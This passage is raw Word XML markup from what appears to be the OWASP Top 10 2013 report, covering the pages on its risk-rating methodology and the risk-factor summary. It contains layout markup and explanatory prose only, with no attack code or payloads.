        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="119466BB">
          <v:shape id="imagerId740" o:spid="_x0000_s2093" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:106pt;margin-top:523pt;width:58pt;height:38pt;z-index:-251689472;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId740" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0535DD98">
          <v:shape id="imagerId741" o:spid="_x0000_s2092" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:223pt;margin-top:521pt;width:90pt;height:39pt;z-index:-251684352;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId741" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7E82C989">
          <v:shape id="imagerId742" o:spid="_x0000_s2091" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:225pt;margin-top:523pt;width:80pt;height:38pt;z-index:-251683328;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId742" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7A7A8B3F">
          <v:shape id="imagerId743" o:spid="_x0000_s2090" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:368pt;margin-top:519pt;width:64pt;height:43pt;z-index:-251688448;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId743" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4A3CE11A">
          <v:shape id="imagerId744" o:spid="_x0000_s2089" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:370pt;margin-top:525pt;width:59pt;height:38pt;z-index:-251687424;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId744" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="1C948DF8">
          <v:shape id="imagerId745" o:spid="_x0000_s2088" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:456pt;margin-top:521pt;width:70pt;height:39pt;z-index:-251686400;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId745" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0A172FAD">
          <v:shape id="imagerId746" o:spid="_x0000_s2087" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:465pt;margin-top:522pt;width:54pt;height:38pt;z-index:-251685376;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId746" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="368CA563">
          <v:shapetype id="_x0000_m2086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CB1A0E1">
          <v:shape id="_x0000_s2085" type="#_x0000_m2086" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-251695616;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="white" stroked="f">
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="5575B061">
          <v:shapetype id="_x0000_m2084" coordsize="54000,3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EFC4E82">
          <v:shape id="_x0000_s2083" type="#_x0000_m2084" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:90pt;width:540pt;height:30pt;z-index:-251694592;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="#d9ebd5" stroked="f">
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="505C9FD3">
          <v:shapetype id="_x0000_m2082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C6C5040">
          <v:shape id="_x0000_s2081" type="#_x0000_m2082" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:119.5pt;width:541pt;height:1pt;z-index:251718144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324F5EA0">
          <v:shapetype id="_x0000_m2080" coordsize="100,63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29EDDC85">
          <v:shape id="_x0000_s2079" type="#_x0000_m2080" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:89pt;width:1pt;height:631pt;z-index:251719168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25319D3B">
          <v:shapetype id="_x0000_m2078" coordsize="100,63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B699BC6">
          <v:shape id="_x0000_s2077" type="#_x0000_m2078" style="position:absolute;left:0;text-align:left;margin-left:539.5pt;margin-top:89pt;width:1pt;height:631pt;z-index:251720192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1D89F5BD">
          <v:shapetype id="_x0000_m2076" coordsize="54100,1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50A52269">
          <v:shape id="_x0000_s2075" type="#_x0000_m2076" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:89.5pt;width:541pt;height:1pt;z-index:251721216;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="#4e8542" strokeweight="1pt">
            <v:fill opacity="0"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6A25EC4F">
          <v:shapetype id="_x0000_m2074" coordsize="13428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BE78E8E">
          <v:shape id="_x0000_s2073" type="#_x0000_m2074" style="position:absolute;left:0;text-align:left;margin-left:250.55pt;margin-top:206pt;width:134.25pt;height:.6pt;z-index:-251693568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0D54C118">
          <v:shapetype id="_x0000_m2072" coordsize="13416,6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7807197">
          <v:shape id="_x0000_s2071" type="#_x0000_m2072" style="position:absolute;left:0;text-align:left;margin-left:24.6pt;margin-top:266pt;width:134.15pt;height:.6pt;z-index:-251692544;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="#3a6331" stroked="f">
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="65926659">
          <v:shapetype id="polygon146" o:spid="_x0000_m2070" coordsize="300,21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C6D62E3">
          <v:shape id="WS_polygon146" o:spid="_x0000_s2069" type="#polygon146" style="position:absolute;left:0;text-align:left;margin-left:95.1pt;margin-top:511.4pt;width:3pt;height:210pt;z-index:25122457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4B777049">
          <v:shapetype id="polygon147" o:spid="_x0000_m2068" coordsize="300,21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01B87D9">
          <v:shape id="WS_polygon147" o:spid="_x0000_s2067" type="#polygon147" style="position:absolute;left:0;text-align:left;margin-left:182.1pt;margin-top:511.4pt;width:3pt;height:210pt;z-index:25122560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7B3755D0">
          <v:shapetype id="polygon148" o:spid="_x0000_m2066" coordsize="300,16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14E3FF6E">
          <v:shape id="WS_polygon148" o:spid="_x0000_s2065" type="#polygon148" style="position:absolute;left:0;text-align:left;margin-left:269.1pt;margin-top:560.65pt;width:3pt;height:160pt;z-index:251226624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9CAE3F9">
          <v:shapetype id="_x0000_m2064" coordsize="300,21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47988619">
          <v:shape id="WS_polygon149" o:spid="_x0000_s2063" type="#_x0000_m2064" style="position:absolute;left:0;text-align:left;margin-left:356.1pt;margin-top:511.4pt;width:3pt;height:210pt;z-index:251227648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415D413A">
          <v:shapetype id="polygon150" o:spid="_x0000_m2062" coordsize="300,21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319C273C">
          <v:shape id="WS_polygon150" o:spid="_x0000_s2061" type="#polygon150" style="position:absolute;left:0;text-align:left;margin-left:443.1pt;margin-top:511.4pt;width:3pt;height:210pt;z-index:251228672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4E9A087B">
          <v:shapetype id="polygon153" o:spid="_x0000_m2060" coordsize="300,21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6442ECE">
          <v:shape id="WS_polygon153" o:spid="_x0000_s2059" type="#polygon153" style="position:absolute;left:0;text-align:left;margin-left:8.1pt;margin-top:511.4pt;width:3pt;height:210pt;z-index:251229696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00C43955">
          <v:shapetype id="_x0000_m2058" coordsize="300,21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02D8109B">
          <v:shape id="WS_polygon154" o:spid="_x0000_s2057" type="#_x0000_m2058" style="position:absolute;left:0;text-align:left;margin-left:530.1pt;margin-top:511.4pt;width:3pt;height:210pt;z-index:251230720;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="black" strokeweight="3pt">
            <v:fill opacity="0"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="3601A98E">
          <v:shapetype id="_x0000_m2056" coordsize="52800,6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78D2881B">
          <v:shape id="WS_polygon156" o:spid="_x0000_s2055" type="#_x0000_m2056" style="position:absolute;left:0;text-align:left;margin-left:6.6pt;margin-top:718.1pt;width:528pt;height:6pt;z-index:251231744;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="black" strokeweight="3pt">
            <v:fill opacity="0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+R</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9E5EE7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="510"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AB9298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Note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About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Risks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2923A06B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56CE027C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3842322E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E8BCE19" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="346E888C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="35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It’s About Risks, Not Weaknesses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F79392E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="421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Although 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2007</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> and earlier versions of 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OWASP Top 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> focused on identifying the most common “vulnerabilities,” the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389356C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OWASP Top 10 has always been organized around risks. This has caused some understandable confusion on the part of people</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0774EB8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searching for an airtight weakness taxonomy. The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6"/>
          <w:sz w:val="19"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>OWASP Top 10 for 2010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> clarified the risk-focus in the Top 10 by being very</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7D899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explicit about how threat agents, attack vectors, weaknesses, technical impacts, and business impacts combine to produce risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A13577F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his version of the OWASP Top 10 follows the same methodology.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2310521E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="442B1E7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The Risk Rating methodology for the Top 10 is based on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="97"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OWASP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A6331"/>
          <w:w w:val="97"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Risk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A6331"/>
          <w:w w:val="97"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Rating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="97"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="97"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Methodology</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="97"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>. For each Top 10 item, we</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453CA5B4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estimated the typical risk that each weakness introduces to a typical web application by looking at common likelihood factors and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ADC880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impact factors for each common weakness. We then rank ordered the Top 10 according to those weaknesses that typically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF1B5BC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introduce the most significant risk to an application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D5C1F8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="217F0450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he </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="88"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="88"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="88"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Risk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="88"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="88"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Rating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="88"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="88"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Methodology</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="88"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> defines numerous factors to help calculate the risk of an identified vulnerability. However,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D533E7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he Top 10 must talk about generalities, rather than specific vulnerabilities in real applications. Consequently, we can never be as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E34D94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precise as system owners can be when calculating risks for their application(s). You are best equipped to judge the importance of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C80EAD0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your applications and data, what your threat agents are, and how your system has been built and is being operated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BCFBDD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45172002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5"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Our methodology includes three likelihood factors for each weakness (prevalence, detectability, and ease of exploit) and one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2333B49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impact factor (technical impact). The prevalence of a weakness is a factor that you typically don’t have to calculate. For</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A39964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prevalence data, we have been supplied prevalence statistics from a number of different organizations (as referenced in the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C403BF6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7"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Acknowledgements section on page 3) and we have averaged their data together to come up with a Top 10 likelihood of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574933C4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existence list by prevalence. This data was then combined with the other two likelihood factors (detectability and ease of exploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E53D98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o calculate a likelihood rating for each weakness. This was then multiplied by our estimated average technical impact for each</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CC8BB2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item to come up with an overall risk ranking for each item in the Top 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F181755" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A4418C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Note that this approach does not take the likelihood of the threat agent into account. Nor does it account for any of the various</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01768E24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echnical details associated with your particular application. Any of these factors could significantly affect the overall likelihood of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C37AF61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an attacker finding and exploiting a particular vulnerability. This rating also does not take into account the actual impact on your</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4FEDD6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6"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>business.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Your organization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> will have to decide how much security risk from applications</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t> the organization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> is willing to accept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786408A0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given your culture, industry, and regulatory environment. The purpose of the OWASP Top 10 is not to do this risk analysis for you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ABD2D2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AC37CF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he following illustrates our calculation of the risk for A3: Cross-Site Scripting, as an example. XSS is so prevalent it warranted the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489DA576" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="241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only ‘VERY WIDESPREAD’ prevalence value of 0. All other risks ranged from widespread to uncommon (value 1 to 3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E16D44" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:widowControl/>
        <w:sectPr w:rsidR="00F13059" w:rsidSect="00F13059">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="10800" w:h="14400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7D29BBE4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="21"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="451A1323" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="970" w:lineRule="exact"/>
        <w:ind w:left="560"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="3FBC6B65">
          <v:shape id="imagerId747" o:spid="_x0000_s2054" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-251680256;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId747" o:title=""/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FFFFFF"/>
          <w:w w:val="98"/>
          <w:sz w:val="96"/>
        </w:rPr>
        <w:t>+F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145D028E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="560"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F37B716" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="791" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="7F7F7F"/>
          <w:w w:val="96"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>Details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About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Risk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="7F7F7F"/>
          <w:w w:val="96"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>Factors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277794FF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2" w:space="720" w:equalWidth="0">
            <w:col w:w="2304" w:space="0"/>
            <w:col w:w="8496" w:space="0"/>
          </w:cols>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="319BB17C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CF4BA63" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="139F47BA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="608F634A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="329" w:lineRule="exact"/>
        <w:ind w:left="144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Top 10 Risk Factor Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E0FAFA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="392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</w:rPr>
        <w:t>The following table presents a summary of the 2013 Top 10 Application Security Risks, and the risk factors we have assigned to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0934A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4"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>each risk. These factors were determined based on the available statistics and the experience of the OWASP Top 10 team. To</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3535601B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understand these risks for a particular application or organization, you must consider your own specific threat agents and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB4AE32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88"/>
          <w:sz w:val="19"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>business impacts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="88"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>. Even egregious software weaknesses may not present a serious risk if there are no threat agents in a position</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8B8B75" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>to perform the necessary attack or the business impact is negligible for the assets involved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D71D26F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02A2B861" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="378822BA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CA909F8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BF05C1C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="392" w:lineRule="exact"/>
        <w:ind w:left="497"/>
      </w:pPr>
      <w:r>
        <w:rPr>
